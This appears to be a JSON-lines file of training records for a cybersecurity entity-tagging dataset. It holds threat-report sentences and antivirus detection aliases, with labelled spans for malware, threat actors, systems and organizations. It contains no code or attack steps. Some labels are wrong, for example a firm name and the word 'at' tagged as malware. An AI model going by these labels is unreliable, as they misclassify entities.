{"text": "A backdoor also known as: Backdoor.Win32.Mutopy!O Trojan.Mutopy.A TROJ_MUTOPY.SMYN Win32.Trojan.WisdomEyes.16070401.9500.9995 TROJ_MUTOPY.SMYN Win.Trojan.Multi-6413508-0 Troj.Dropper.W32.Dapato.lCcB Trojan.MulDrop4.10927 BehavesLike.Win32.Downloader.hh TR/Kazy.34213.jh Trojan:Win32/Mutopy.A Trojan.Naffy.1 Trojan/Win32.HDC.C53646 TScope.Malware-Cryptor.SB Trojan.Win32.Jorik W32/Rodecap.AS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004231", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.W32.Androm.toYX Trojan/Injector.drgl Win32.Trojan.WisdomEyes.16070401.9500.9978 Win.Trojan.WillExec-6356235-0 Backdoor.Androm.sdz Trojan.Zusy.D3FE2C Trojan:Win32/Lethic.Q!bit Backdoor.Androm Trj/GdSda.A W32/Injector.DQID!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004234", "source": "cyner2_train"}}
{"text": "Samples uploaded to public repositories indicate that the new version of Typhon Reborn has been in the wild since December 2022.", "spans": {"MALWARE: Samples": [[0, 7]], "SYSTEM: public repositories": [[20, 39]], "MALWARE: Typhon Reborn": [[73, 86]]}, "info": {"id": "cyner2_train_004235", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.RHUU-4415 MSIL.Trojan.Packed.G Trojan-Dropper.Win32.Scrop.ccm Trojan.Win32.Inject.dzszva Trojan.PWS.Multi.1690 BehavesLike.Win32.Trojan.tc TrojanDropper.Sysn.arw TR/Injector.drydq Trojan/MSIL.Inject Trojan:MSIL/Plimrost.B Trojan.Kazy.DAD984 Trojan-Dropper.Win32.Scrop.ccm Trojan/Win32.Injector.C952834 Trj/CI.A Trojan.MSIL.Injector MSIL/Kryptik.DDP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004236", "source": "cyner2_train"}}
{"text": "Zcrypt uses the Nullsoft Scriptable Install System, which works like a Zip file, decompressing and loading the content while running.", "spans": {"MALWARE: Zcrypt": [[0, 6]], "SYSTEM: the Nullsoft Scriptable Install System,": [[12, 51]]}, "info": {"id": "cyner2_train_004237", "source": "cyner2_train"}}
{"text": "The malware used in the new attacks was a variant of the infamous Shamoon worm that targeted Saudi Aramco and Rasgas back in 2012.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: variant": [[42, 49]], "MALWARE: Shamoon worm": [[66, 78]], "ORGANIZATION: Saudi Aramco": [[93, 105]], "ORGANIZATION: Rasgas": [[110, 116]]}, "info": {"id": "cyner2_train_004238", "source": "cyner2_train"}}
{"text": "This technical note discusses a relatively undocumented implant used by the APT10 group.", "spans": {"THREAT_ACTOR: APT10 group.": [[76, 88]]}, "info": {"id": "cyner2_train_004242", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_STARTPA.NSS W32/Backdoor2.HTGN Win32/Wysotot.GJVbdHD TROJ_STARTPA.NSS Win32.Trojan-Hijacker.Wysotot.A Trojan.Win32.AdLoad.eizvbn Adware.Mutabaha.255 Adware.MutabahaCRTD.Win32.1189 BehavesLike.Win32.ICLoader.gc Backdoor.Win32.ZAccess W32/Backdoor.SAIZ-5729 Trojan/Win32.StartPage Trojan.Adware.Zusy.D1584D PUP.Elex/Variant Downloader/Win32.Adware.R86759 Trojan.StartPage PUP.Optional.Elex Trj/CI.A Trojan.StartPage!B6aZ1c5P97Y", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004243", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL.Crypt.gauf Trojan.Starter.7472 Trojan.MSIL.ilny TR/AD.Binderon.roatv Trojan.Ursu.D13D6D Trojan.MSIL.Crypt.gauf PWS:AutoIt/Passup.A Win32/Spy.Autoit.BY Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004244", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.1BC9 Trojan.Banavkill Trojan-Banker.Win32.Banbra.wjem Trojan.Win32.Banbra.exnyzm TR/Spy.Banker.ohxzm Trojan.Ursu.D10A45 Trojan-Banker.Win32.Banbra.wjem Trojan:Win32/Banavkill.A Trojan/Win32.Banbra.C2352559 Trojan-Banker.Banbra Trj/GdSda.A Win32.Trojan.Falsesign.Htma Win32/Trojan.f8b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004245", "source": "cyner2_train"}}
{"text": "We are providing a detailed analysis of the rootkit, and also making the samples available to the industry to help others block this threat.", "spans": {"MALWARE: rootkit,": [[44, 52]], "ORGANIZATION: industry": [[98, 106]], "MALWARE: threat.": [[133, 140]]}, "info": {"id": "cyner2_train_004246", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGamesLT180912HKGHAAI.Trojan Trojan.PWS.OnlineGames.ZON Trojan.PWS.OnlineGames.ZON Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Gampass TSPY_ONLINEG.FGF Win.Trojan.Onlinegames-44 Trojan.PWS.OnlineGames.ZON Trojan.PWS.OnlineGames.ZON Trojan.Win32.OnLineGames.rzwt Troj.PSW32.W.OnLineGames.aoem!c Trojan.PWS.OnlineGames.ZON Packed.Win32.MUPACK.~KW Trojan.PWS.OnlineGames.ZON Trojan.PWS.Wsgame.5652 Trojan.OnLineGames.Win32.160328 TSPY_ONLINEG.FGF BehavesLike.Win32.Sdbot.cz Trojan/PSW.OnLineGames.akkc TrojanDropper:Win32/Tilcun.E Trojan/Win32.MalPack.C60090 Trojan.PWS.OnlineGames.ZON BScope.Trojan-PSW.Gomex.22 Trj/Pupack.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004248", "source": "cyner2_train"}}
{"text": "The infamous Remote Access Trojan RAT Poison Ivy hereafter referred to as PIVY has resurfaced recently, and exhibits some new behaviors.", "spans": {"MALWARE: The infamous Remote Access Trojan RAT Poison Ivy": [[0, 48]], "MALWARE: PIVY": [[74, 78]]}, "info": {"id": "cyner2_train_004249", "source": "cyner2_train"}}
{"text": "However, we recently encountered a botnet that uses a more unusual method: an FTP server that, in effect, acts as a C C server.", "spans": {"MALWARE: botnet": [[35, 41]], "SYSTEM: an FTP server": [[75, 88]]}, "info": {"id": "cyner2_train_004250", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Small.40960.BX TROJ_FAKEAV.ASI W32/Backdoor2.HASV Backdoor.Trojan.B Win32/Wonip.A TROJ_FAKEAV.ASI Trojan.PWS.Sniftp.15 W32/Backdoor.YSEB-6778 BDS/Wonip.A Backdoor:Win32/Wonip.A Trojan/Win32.Xema.C82592 W32/Backdr.FB!tr Win32/Backdoor.435", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004251", "source": "cyner2_train"}}
{"text": "Since we published our article on Sage 2.0 last February, and the discovery of version 2.2 in March, the FortiGuard Labs team hasn't seen significant activity with this malware for over six months.", "spans": {"MALWARE: Sage 2.0": [[34, 42]], "MALWARE: version 2.2": [[79, 90]], "ORGANIZATION: the FortiGuard Labs team": [[101, 125]], "MALWARE: malware": [[169, 176]]}, "info": {"id": "cyner2_train_004252", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Qhosts Trojan.Win32.Z.Redcap.1251647 TR/RedCap.ymgda", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004253", "source": "cyner2_train"}}
{"text": "We identified one specific spear phishing campaign launched against targets within Palestine, and specifically against Palestinian law enforcement agencies.", "spans": {"THREAT_ACTOR: spear phishing campaign": [[27, 50]], "ORGANIZATION: Palestinian law enforcement agencies.": [[119, 156]]}, "info": {"id": "cyner2_train_004255", "source": "cyner2_train"}}
{"text": "Once installed on a device FrozenCell is capable of : Recording calls Retrieving generic phone metadata ( e.g. , cell location , mobile country code , mobile network code ) Geolocating a device Extracting SMS messages Retrieving a victim 's accounts Exfiltrating images Downloading and installing additional applications Searching for and exfiltrating pdf , doc , docx , ppt , pptx , xls , and xlsx file types Retrieving contacts The graph below represents a split of the types of data from only one misconfigured command and control server ( out of over 37 servers ) .", "spans": {"MALWARE: FrozenCell": [[27, 37]]}, "info": {"id": "cyner2_train_004257", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Yurist.Win32.37 Win32.Trojan.WisdomEyes.16070401.9500.9992 Backdoor.Win32.Yurist.cy Trojan.Win32.XFlash.bodumo Backdoor.W32.Yurist.cp!c Heur.Packed.Unknown BackDoor.XFlash BehavesLike.Win32.Backdoor.ph Backdoor/Yurist.z BDS/Yurist.K Backdoor:Win32/Yurist.K Trojan.Graftor.D45274 Backdoor.Win32.Yurist.cy Trojan/Win32.LdPinch.C27294 Win32.Backdoor.Yurist.Eads Backdoor.Yurist!9F5bediy4gg Backdoor.Win32.Yurist Trj/CI.A Win32/Backdoor.c62", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004258", "source": "cyner2_train"}}
{"text": "If the victim opens it up, it will not only infect their system but send the same phishing document to other contacts via their Outlook inbox.", "spans": {"SYSTEM: system": [[57, 63]], "SYSTEM: Outlook inbox.": [[128, 142]]}, "info": {"id": "cyner2_train_004259", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BKDR_BAYROB.SM4 Win32.Trojan.WisdomEyes.16070401.9500.9948 BKDR_BAYROB.SM4 TrojWare.Win32.Bayrob.A Trojan.Kelios.1 Trojan:Win32/Horkremoz.A W32/Bayrob.O!tr Win32/Trojan.4af", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004260", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.TDSS!O Backdoor.TDSS.Win32.7367 Trojan/Olmarik.akn Trojan.TDss.58 Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_ALUREON_CD102969.RDXN Win.Trojan.Tdss-302 Backdoor.Win32.TDSS.dtx Trojan.Win32.TDSS.cdwoi Backdoor.Win32.A.Tdss.63488.B TrojWare.Win32.Olmarik.AME Trojan.DownLoader1.46896 TSPY_ALUREON_CD102969.RDXN BehavesLike.Win32.VBObfus.kh Backdoor.Win32.TDSS Backdoor/TDSS.apn Trojan[Backdoor]/Win32.TDSS Win32.Hack.TDSS.d.kcloud Backdoor.Win32.TDSS.dtx Trojan/Win32.Tdss.R1603 DNSChanger.ca Trojan.FakeAlert Win32/Olmarik.AKN Backdoor.TDSS!fzuavqQuzWg W32/DNSChanger.CA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004261", "source": "cyner2_train"}}
{"text": "This, combined with its focus on a specific region, makes this threat interesting from the malware researchers' perspective.", "spans": {"MALWARE: threat": [[63, 69]], "ORGANIZATION: malware researchers'": [[91, 111]]}, "info": {"id": "cyner2_train_004263", "source": "cyner2_train"}}
{"text": "Once they obtained access to the server, the attackers infected the system with two malicious payloads.", "spans": {"SYSTEM: server,": [[33, 40]], "THREAT_ACTOR: attackers": [[45, 54]], "SYSTEM: system": [[68, 74]], "MALWARE: malicious payloads.": [[84, 103]]}, "info": {"id": "cyner2_train_004264", "source": "cyner2_train"}}
{"text": "A typical Lurk infection uses browser exploits to deliver non-persistent payloads to potential victims, probing their targets before deploying additional malware.", "spans": {"THREAT_ACTOR: Lurk": [[10, 14]], "VULNERABILITY: browser exploits": [[30, 46]], "MALWARE: non-persistent payloads": [[58, 81]], "ORGANIZATION: potential victims,": [[85, 103]], "MALWARE: deploying additional malware.": [[133, 162]]}, "info": {"id": "cyner2_train_004266", "source": "cyner2_train"}}
{"text": "Some of the popular Android applications that Ewind targets include GTA Vice City, AVG cleaner, Minecraft – Pocket Edition, Avast! Ransomware Removal, VKontakte, and Opera Mobile.", "spans": {"SYSTEM: Android applications": [[20, 40]], "MALWARE: Ewind": [[46, 51]], "SYSTEM: GTA Vice City, AVG cleaner, Minecraft – Pocket Edition, Avast! Ransomware Removal, VKontakte,": [[68, 161]], "SYSTEM: Opera Mobile.": [[166, 179]]}, "info": {"id": "cyner2_train_004268", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Strictor.D1F9FA Trojan.Win32.BuhTrap.c Trojan.YakesCRTD.Win32.4839 Trojan/Win32.BuhTrap.c Backdoor:Win32/Buhtrap.A!dha Trojan.Win32.BuhTrap.c Trj/GdSda.A Backdoor.Win32.Buhtrap W32/Delf.QJL!tr Win32/Trojan.5c7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004271", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Etap.d Win32.Trojan.WisdomEyes.16070401.9500.9826 Trojan.GootKit!gm BehavesLike.Win32.Injector.fh Trojan.Barys.D1A48", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004275", "source": "cyner2_train"}}
{"text": "That's why we refer to this malware as Shakti Trojan.", "spans": {"MALWARE: malware": [[28, 35]], "MALWARE: Shakti Trojan.": [[39, 53]]}, "info": {"id": "cyner2_train_004277", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Klone.bz W32/MUPX.A Packed.Win32.Klone.bz BackDoor.IRC.Rxbot.69 Backdoor.Win32.Rbot!IK Win32.Hack.Klone.bz.kcloud Packed/Win32.Klone Backdoor.IRCbot!312D Backdoor.Win32.Rbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004278", "source": "cyner2_train"}}
{"text": "Attackers also used the name of the top-ranking official associated with Minister of Home affairs in the signature of the email, this is to make it look like the email was sent by a high-ranking Government official associated with Ministry of Home Affairs MHA.", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "ORGANIZATION: Minister of Home affairs": [[73, 97]], "ORGANIZATION: Ministry of Home Affairs MHA.": [[231, 260]]}, "info": {"id": "cyner2_train_004279", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Crypt.GH Trojan.Crypt.GH Trojan.Crypt.GH Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Gampass TROJ_PUKISH.A Trojan.Crypt.GH Win32.Trojan-dropper.Drob.Pdmj Trojan.Crypt.GH Trojan.Crypt.GH Trojan.MulDrop7.42417 TROJ_PUKISH.A Trojan-Dropper.Win32.Drob W32/Trojan.SPVB-8287 Win32.Infect.a.124448 TrojanDropper:Win32/Pukish.A Trojan.Crypt.GH Trj/CI.A Win32/Trojan.f42", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004280", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.W.CodeRed.l11t Exploit:Win32/CVE-2006-3942.A Exploit.Win32.CVE-2006-3942", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004281", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Troj.W32.Havex!c Win32.Trojan.WisdomEyes.16070401.9500.9950 Trojan.Win32.Havex.tm Trojan.Proxy2.1026 BehavesLike.Win32.Dropper.gh Trojan.Havex.w TR/Havex.fbdyv Trojan.Win32.Havex.tm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004282", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.P2P.Puce.G Worm/W32.Kapucen.106496.EK I-Worm.Kapucen.b.n4 W32/Kapucen.b Trojan.Win32.Kapucen.qyzel Win32/Puce.D WORM_KAPUCEN.B Worm.Puce.E P2P-Worm.Win32.Kapucen.b Win32.Worm.P2P.Puce.G Worm.Kapucen.A Worm.Win32.P2P-Kapucen.106496.C Worm.Win32.Kapucen.B Win32.Worm.P2P.Puce.G Win32.HLLW.Puce Worm/Puce.D.90 WORM_KAPUCEN.B Worm/P2P.Kapcen.b Worm:Win32/Puce.D Win32.Worm.P2P.Puce.G Worm/Win32.Kapucen Trojan.Win32.Kapucen.B Win32/Kapucen.B P2P-Worm.Win32.Kapucen.b W32/Kapucen.fam!worm.p2p Win32/Puce.C W32/Puce.E.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004283", "source": "cyner2_train"}}
{"text": "On July 17, 2017, we detected a malicious document in VirusTotal exploiting CVE-2017-0199.", "spans": {"ORGANIZATION: VirusTotal": [[54, 64]], "VULNERABILITY: exploiting": [[65, 75]]}, "info": {"id": "cyner2_train_004284", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Packed.Win32.Klone!O Backdoor.SkSocket Backdoor.Trojan Trojan.Win32.SkSocket.uwlqa Backdoor.Win32.SkSocket.109_t0 BackDoor.Sksock Virus.Win32.SkSocket.C Backdoor/SkSocket.o BDS/SkSocket.109 Win-Trojan/SkSocket.40960 Trj/CI.A Win32/SkSocket.109 Win32.Backdoor.Sksocket.Dyqp Trojan/Win32.lssj.2cc.rgrk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004285", "source": "cyner2_train"}}
{"text": "Initial indicators of compromise from todays WannaCry ransomware outbreak.", "spans": {"MALWARE: WannaCry ransomware": [[45, 64]]}, "info": {"id": "cyner2_train_004286", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9971 Win.Spyware.1756-2 BehavesLike.Win32.Autorun.dc Trojan/Win32.Xema.C73573", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004287", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod62e.Trojan.18e2 Win32.Trojan.WisdomEyes.16070401.9500.9922 Trojan.Kasperbogi W32/Trojan.PRNK-2932 TR/Golroted.jumln Trojan.Strictor.D16D8E Trojan:Win32/Parsky.A!bit Trj/GdSda.A Win32/Trojan.cfd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004289", "source": "cyner2_train"}}
{"text": "A recent investigation by security firm CTI has identified a new wave of malware delivered to the MaaS and PPI service providers in the underground black markets, including a controversial piece of code linked to North-Korean hackers.", "spans": {"ORGANIZATION: security firm CTI": [[26, 43]], "MALWARE: malware": [[73, 80]], "ORGANIZATION: MaaS and PPI service providers": [[98, 128]], "THREAT_ACTOR: the underground black markets,": [[132, 162]], "THREAT_ACTOR: North-Korean hackers.": [[213, 234]]}, "info": {"id": "cyner2_train_004290", "source": "cyner2_train"}}
{"text": "The payload, distributed disguised as antivirus, is a variant of Korplug RAT aka PlugX – a spyware with former associations with Chinese APT groups, and known from targeted attacks at important institutions of various countries.", "spans": {"MALWARE: payload,": [[4, 12]], "SYSTEM: antivirus,": [[38, 48]], "MALWARE: Korplug RAT": [[65, 76]], "MALWARE: PlugX": [[81, 86]], "MALWARE: spyware": [[91, 98]], "THREAT_ACTOR: Chinese APT groups,": [[129, 148]], "MALWARE: at": [[181, 183]], "ORGANIZATION: institutions": [[194, 206]]}, "info": {"id": "cyner2_train_004292", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PUP.Optional.FilePile.A PE:PUF.FilePile!1.9E19", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004293", "source": "cyner2_train"}}
{"text": "The site was redirecting visitors to the malware through a compromised OpenX Ad server injecting a malicious iframe into the page.", "spans": {"ORGANIZATION: visitors": [[25, 33]], "MALWARE: malware": [[41, 48]]}, "info": {"id": "cyner2_train_004294", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.Ad.Pdms Trojan.InstallCube.412 Variant.Kazy.apq TR/AD.Fakruce.M.2 Trojan.Kazy.DBFFE0 Trojan.Win32.Z.Kazy.2435953 Trojan:Win32/Fakruce.B Trojan.Kazy!YZdrjH6xcT8 Trj/CI.A Win32/Trojan.824", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004295", "source": "cyner2_train"}}
{"text": "Shamoon W32.Disttrack first made headlines in 2012 when it was used in attacks against energy companies in Saudi Arabia.", "spans": {"MALWARE: Shamoon": [[0, 7]], "ORGANIZATION: energy companies": [[87, 103]]}, "info": {"id": "cyner2_train_004297", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Rootkit.Koutodoor.a TrojWare.Win32.Zybr.A W32.Trojan.Koutodoor.E Trojan:Win32/Koutodoor.F Trojan.Zusy.D41F3C Trojan.Win32.koutodoor.i Trojan.Rootkit RootKit.Win32.Koutodoor.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004299", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.NSIS Win32.Trojan.WisdomEyes.16070401.9500.9623 TR/AD.Trochilus.illau Backdoor:Win32/Trochil.A.dll!dha Win32/Korplug.KA Win32/Trojan.d66", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004300", "source": "cyner2_train"}}
{"text": "From troubleshooting machines across countries to observing employees across rooms, RAT solutions have become widely used tools for remote maintenance and monitoring.", "spans": {"SYSTEM: machines": [[21, 29]], "ORGANIZATION: employees": [[60, 69]], "MALWARE: RAT": [[84, 87]]}, "info": {"id": "cyner2_train_004303", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.AntiAV.1355776.B Trojan.Win32.Vilsel!O Worm.Pykspa.C3 Worm.SkypeBot Trojan.Pykspa.1 Win32.Worm.Autorun.o W32.Pykspa.D Win32/Vilsel.CE WORM_VILSEL.SMC Win.Worm.Pykspa-1 Trojan-Ransom.Win32.Blocker.jcen Backdoor.W32.Zepfod.lohV Worm.Win32.Pykspa.a WORM_VILSEL.SMC BehavesLike.Win32.Pykse.tz Trojan/Blocker.lhz Trojan/Win32.AntiAV Trojan-Ransom.Win32.Blocker.jcen Trojan/Win32.Zepfod.R4378 Trojan.ChidikSun.28205 Trojan.Pykspa Trojan.Win32.Spy Trj/Vilsel.B Worm.Win32.Pykse.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004305", "source": "cyner2_train"}}
{"text": "Mobile malware's disruptive impact on enterprises continues to see an uptick in prevalence as mobile devices become an increasingly preferred platform to flexibly access and manage data.", "spans": {"MALWARE: Mobile malware's": [[0, 16]], "SYSTEM: mobile devices": [[94, 108]]}, "info": {"id": "cyner2_train_004306", "source": "cyner2_train"}}
{"text": "Morphick responded to a Kronos phishing campaign that involved a document with a malicious macro that downloaded the Kronos banking malware.", "spans": {"ORGANIZATION: Morphick": [[0, 8]], "THREAT_ACTOR: Kronos phishing campaign": [[24, 48]], "MALWARE: malicious macro": [[81, 96]], "MALWARE: Kronos banking malware.": [[117, 140]]}, "info": {"id": "cyner2_train_004307", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.D13264 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.DownLoad3.euzkrf Trojan.Win32.Z.Graftor.605184.A Trojan.DownLoad3.23753 BehavesLike.Win32.Trojan.hh Trojan.Win32.CoinMiner Trojan/Win32.Unknown Trojan:Win32/Herxmin.A Trojan.CoinMiner!kUww8sDe3p0 W32/CoinMiner.CE!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004310", "source": "cyner2_train"}}
{"text": "The overall motivation of this campaign is unclear at this time.", "spans": {"THREAT_ACTOR: campaign": [[31, 39]]}, "info": {"id": "cyner2_train_004312", "source": "cyner2_train"}}
{"text": "In fact, they have been using them since at least 2014 with very few variations in their modus operandi.", "spans": {}, "info": {"id": "cyner2_train_004313", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Info_InstallNA128.Trojan Trojan/W32.Buzus.61952.BP Trojan.Bulta Win32.Trojan.WisdomEyes.16070401.9500.9891 W32/MalwareS.FWD Win32/Tnega.AUFK Trojan.Win32.Drop.cuupf Trojan.Win32.Buzus.61952.D Trojan.Inject.63252 Trojan.Buzus.Win32.27194 BehavesLike.Win32.Backdoor.kh W32/Risk.CHGA-0655 Trojan/Buzus.svw Trojan/Win32.Buzus Backdoor:Win32/Gaertob.A Troj.W32.Buzus.tnoM Trojan/Win32.Buzus.R42500 BScope.Trojan.Palevo.012 Trojan.Buzus Trojan.Buzus!iqgr48px8nU Virus.Win32.Injector W32/Injector.fam!tr Win32/Trojan.203", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004314", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FadobesLTA.Trojan Trojan.Nixofro.A3 Trojan/Downloader.VB.qjf W32/Backdoor.VMXK-0114 Win32/TrojanDownloader.VB.QJF TROJ_SPNR.35CD14 Trojan.Win32.Foreign.ctjhyf Trojan.Win32.Z.Foreign.1078272.B[h] Troj.Ransom.W32.Foreign.kcme!c Trojan:W32/Kilim.P Trojan.Guncelle.2 Trojan.Foreign.Win32.41642 TROJ_SPNR.35CD14 BehavesLike.Win32.Trojan.tm W32/Backdoor2.HUDC TR/Kazy.323825.8 W32/Foreign.KCME!tr Trojan[Ransom]/Win32.Foreign Win32.Troj.Undef.kcloud Trojan.Symmi.D97A6 Trojan:Win32/Nixofro.A Hoax.Foreign Win32.Trojan.Foreign.Htmh Trojan.Win32.Nixofro", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004315", "source": "cyner2_train"}}
{"text": "This was developed as an alternative to [Telnet]https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-netcat-swiss-army-knife-hacking-tools-0148657/, which sends information in plaintext, which is clearly a problem, especially when [passwords]https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-1-principles-technologies-0156136/ are involved.", "spans": {"MALWARE: [Telnet]https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-netcat-swiss-army-knife-hacking-tools-0148657/,": [[40, 154]]}, "info": {"id": "cyner2_train_004318", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Tiny.S22205 Win32.Trojan.WisdomEyes.16070401.9500.9981 TrojanDownloader.TinyLoader.c TR/Crypt.Xpack.xhbzp Trojan:Win32/Anobato.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004320", "source": "cyner2_train"}}
{"text": "root9B discovered an advanced, targeted PoS intrusion focused on harvesting payment card information for exfiltration.", "spans": {"MALWARE: root9B": [[0, 6]]}, "info": {"id": "cyner2_train_004321", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.FD30 Backdoor.Win32.Delf!O Backdoor.Delf.Win32.7383 Win32.Worm.Delf.cq W32.Minudazash Win.Trojan.Delf-10643 Backdoor.Win32.Delf.oqi Trojan.Win32.Delf.culgk Backdoor.Win32.Delf.308224.E Win32.HLLW.Autoruner1.11184 BehavesLike.Win32.Fake.fc Virus.Win32.Virut Backdoor/Delf.ode Trojan[Backdoor]/Win32.Delf Worm:Win32/Scafros.A Backdoor.Win32.Delf.oqi Win32/FakeMS.WOCR Backdoor.Delf W32/Banker.LWD Backdoor.Delf!0+it/723aCk W32/Delf.OQI!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004322", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dukescamlock Trojan.TechSupportScam Ransom_DukescamLock.R002C0TK817 Win32.Trojan.WisdomEyes.16070401.9500.9553 W32.Golroted Ransom_DukescamLock.R002C0TK817 Trojan-FakeAV.MSIL.FakeSupport.d Trojan.KillProc.49845 Ransom.MSIL.DukescamLock TR/FakeSupport.gixtd Ransom:MSIL/DukescamLock.A Trojan-FakeAV.MSIL.FakeSupport.d Trj/GdSda.A MSIL/FakeSupport.AZ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004324", "source": "cyner2_train"}}
{"text": "ESET researchers have discovered a new sneaky malware threat named Joao, targeting gamers worldwide.", "spans": {"ORGANIZATION: ESET researchers": [[0, 16]], "MALWARE: new sneaky malware threat": [[35, 60]], "MALWARE: Joao,": [[67, 72]]}, "info": {"id": "cyner2_train_004326", "source": "cyner2_train"}}
{"text": "CryptoWall is one ransomware variant that has shown gradual evolution over the past year with CryptoWall 2 and Cryptowall 3.", "spans": {"MALWARE: CryptoWall": [[0, 10]], "MALWARE: ransomware variant": [[18, 36]], "MALWARE: CryptoWall 2": [[94, 106]], "MALWARE: Cryptowall 3.": [[111, 124]]}, "info": {"id": "cyner2_train_004327", "source": "cyner2_train"}}
{"text": "Yesterday January 19th we discovered a new wave of these attacks, where a number of electricity distribution companies in Ukraine were targeted again following the power outages in December.", "spans": {"ORGANIZATION: electricity distribution companies": [[84, 118]]}, "info": {"id": "cyner2_train_004328", "source": "cyner2_train"}}
{"text": "Case in point: the emergence of UIWIX ransomware detected by Trend Micro as RANSOM_UIWIX.A and one notable Trojan our sensors detected.", "spans": {"MALWARE: UIWIX ransomware": [[32, 48]], "ORGANIZATION: Trend Micro": [[61, 72]], "MALWARE: Trojan": [[107, 113]]}, "info": {"id": "cyner2_train_004330", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Trojan.Patched.JJ Trojan.Patched.JJ Trojan.Patched.JJ Win32.Trojan.WisdomEyes.16070401.9500.9925 Backdoor.Graybird Trojan.Patched.JJ Trojan.Patched.JJ Trojan.Patched.JJ BehavesLike.Win32.BadFile.gh W32.Trojan.Patched Trojan:Win32/Jaku.C!dha Trojan.Patched.JJ Trojan.Win32.Jaku", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004331", "source": "cyner2_train"}}
